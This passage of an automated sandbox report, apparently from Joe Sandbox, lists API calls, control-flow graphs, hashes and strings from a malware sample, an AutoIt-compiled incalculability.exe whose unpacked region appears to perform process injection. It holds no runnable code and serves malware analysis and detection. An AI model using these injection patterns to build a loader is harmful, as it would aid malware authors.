                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                            • String ID: ,*H$4*H$@fI
                            • API String ID: 615853336-1459471987
                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                            Function 03F27EC0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2065 3f27ec0-3f27f6e call 3f25830 2068 3f27f75-3f27f9b call 3f28dd0 CreateFileW 2065->2068 2071 3f27fa2-3f27fb2 2068->2071 2072 3f27f9d 2068->2072 2079 3f27fb4 2071->2079 2080 3f27fb9-3f27fd3 VirtualAlloc 2071->2080 2073 3f280ed-3f280f1 2072->2073 2075 3f28133-3f28136 2073->2075 2076 3f280f3-3f280f7 2073->2076 2081 3f28139-3f28140 2075->2081 2077 3f28103-3f28107 2076->2077 2078 3f280f9-3f280fc 2076->2078 2082 3f28117-3f2811b 2077->2082 2083 3f28109-3f28113 2077->2083 2078->2077 2079->2073 2084 3f27fd5 2080->2084 2085 3f27fda-3f27ff1 ReadFile 2080->2085 2086 3f28142-3f2814d 2081->2086 2087 3f28195-3f281aa 2081->2087 2090 3f2812b 2082->2090 2091 3f2811d-3f28127 2082->2091 2083->2082 2084->2073 2092 3f27ff3 2085->2092 2093 3f27ff8-3f28038 VirtualAlloc 2085->2093 2094 3f28151-3f2815d 2086->2094 2095 3f2814f 2086->2095 2088 3f281ba-3f281c2 2087->2088 2089 3f281ac-3f281b7 VirtualFree 2087->2089 2089->2088 2090->2075 2091->2090 2092->2073 2096 3f2803a 2093->2096 2097 3f2803f-3f2805a call 3f29020 2093->2097 2098 3f28171-3f2817d 2094->2098 2099 3f2815f-3f2816f 2094->2099 2095->2087 2096->2073 2105 3f28065-3f2806f 2097->2105 2101 3f2818a-3f28190 2098->2101 2102 3f2817f-3f28188 2098->2102 2100 3f28193 2099->2100 2100->2081 2101->2100 2102->2100 2106 3f280a2-3f280b6 call 3f28e30 2105->2106 2107 3f28071-3f280a0 call 3f29020 2105->2107 2113 3f280ba-3f280be 2106->2113 2114 3f280b8 2106->2114 2107->2105 2115 3f280c0-3f280c4 CloseHandle 2113->2115 2116 3f280ca-3f280ce 2113->2116 2114->2073 2115->2116 2117 3f280d0-3f280db VirtualFree 2116->2117 2118 3f280de-3f280e7 2116->2118 2117->2118 2118->2068 2118->2073
                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F27F91
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F281B7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
                            • Instruction ID: 12b134ac432d97273e8eb480d73cc5925c762a194c616b187beaab1c55dc45ab
                            • Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
                            • Instruction Fuzzy Hash: B4A13875E00219EBDB14CFA4C894BEEBBB5FF48304F248599E611BB290C7759A41CF94
                            Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                            APIs
                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                            • _wcsncpy.LIBCMT ref: 004102ED
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                            • _wcsncpy.LIBCMT ref: 00410340
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                            • String ID: C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 3170942423-3305596882
                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                            Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2148 4012c5-4012cb 2146->2148 2149 42733f-427346 2146->2149 2150 4272f4-427315 Shell_NotifyIconW 2147->2150 2151 42731a-42733a Shell_NotifyIconW 2147->2151 2148->2144 2154 427393-4273b4 Shell_NotifyIconW 2148->2154 2152 427348-427369 Shell_NotifyIconW 2149->2152 2153 42736e-42738e Shell_NotifyIconW 2149->2153 2150->2144 2151->2144 2152->2144 2153->2144 2154->2144
                            APIs
                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 3300667738-0
                            • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                            • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                            Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                            APIs
                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                            Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                            Function 03F27C30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 03F27B20: Sleep.KERNELBASE(000001F4), ref: 03F27B31
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F27D93
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: 6PMEYP3BRCEVO4KGOPEMO0BVBCDN
                            • API String ID: 2694422964-132674940
                            • Opcode ID: 21f2e269d7618c356f07dab4f771d04d238967e82db96af062d369ff4526838d
                            • Instruction ID: 19e26e39110030aaee68b3e9de658f87bc6d6dec710f13805887eaa4bfa163dc
                            • Opcode Fuzzy Hash: 21f2e269d7618c356f07dab4f771d04d238967e82db96af062d369ff4526838d
                            • Instruction Fuzzy Hash: 20718231D04298DAEF11DBB4C854BEEBF75AF15304F044198E6487B2C1D7BA1B49CBA6
                            Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcsncpy.LIBCMT ref: 00401C41
                            • _wcscpy.LIBCMT ref: 00401C5D
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                            • String ID: Line:
                            • API String ID: 1874344091-1585850449
                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                            Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Close$OpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 1607946009-824357125
                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                            Function 03F26B20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03F2734D
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F27371
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F27393
                            • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 03F2769C
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                            • String ID:
                            • API String ID: 572931308-0
                            • Opcode ID: 8780c15dadd006f81780a27766e8c11566e43d2e82ae2738a64701d70b4000ce
                            • Instruction ID: a3f6b5befcc3a0521bdd8bcbb0c3415aadf8ef09a74da458bb4fe842b3e74690
                            • Opcode Fuzzy Hash: 8780c15dadd006f81780a27766e8c11566e43d2e82ae2738a64701d70b4000ce
                            • Instruction Fuzzy Hash: 24621930A14218DBEB24DFA4C850BDEB776EF58300F1091A9D10DEB391E77A9E85CB59
                            Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                            • _free.LIBCMT ref: 004295A0
                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 3938964917-2102448705
                            • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                            • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                            Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: Error:
                            • API String ID: 4104443479-232661952
                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                            Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                            • String ID: X$pWH
                            • API String ID: 85490731-941433119
                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                            Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 00401B57
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
